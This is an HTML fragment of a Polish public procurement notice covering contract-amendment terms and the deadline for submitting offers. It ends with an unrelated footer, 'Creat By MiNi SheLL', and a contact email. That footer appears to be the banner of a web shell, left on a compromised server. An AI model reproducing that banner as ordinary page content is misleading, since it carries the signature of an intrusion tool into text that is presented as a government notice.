Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wyboru oferty złożonej przez Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia Zamawiający zastrzega sobie prawo żądania przed zawarciem<br/>umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych<br/>Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający dopuszcza możliwość dokonania zmiany postanowień umowy w stosunku do treści oferty Wykonawcy wyłącznie w przypadku zaistnienia jednej z następujących okoliczności i w zakresie określonym poniżej:<br/>1)	zaistnienia siły wyższej uniemożliwiającej wykonanie przedmiotu umowy zgodnie z SWZ,<br/>2)	zaistnienia innej, niemożliwej do przewidzenia w momencie zawarcia niniejszej umowy okoliczności prawnej, ekonomicznej lub technicznej, za którą żadna ze Stron nie ponosi odpowiedzialności, skutkującej brakiem możliwości należytego wykonania niniejszej umowy zgodnie z SWZ,<br/>3)	zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy lub świadczenia Stron,<br/>4) powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w niniejszej umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie niniejszej umowy w celu jednoznacznej interpretacji jej zapisów przez Strony,<br/>5) zaistnienia przyczyn niezależnych od działania Stron, których przy zachowaniu wszelkich należytych środków nie można było uniknąć, ani im zapobiec.<br/>2.	Podstawą do dokonania zmian, o których jest mowa w ust. 1, jest złożenie wniosku przez jedną ze Stron i jego akceptacja przez drugą Stronę. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-07 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma e-Zamówienia, pod adresem: https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-07 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 28 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com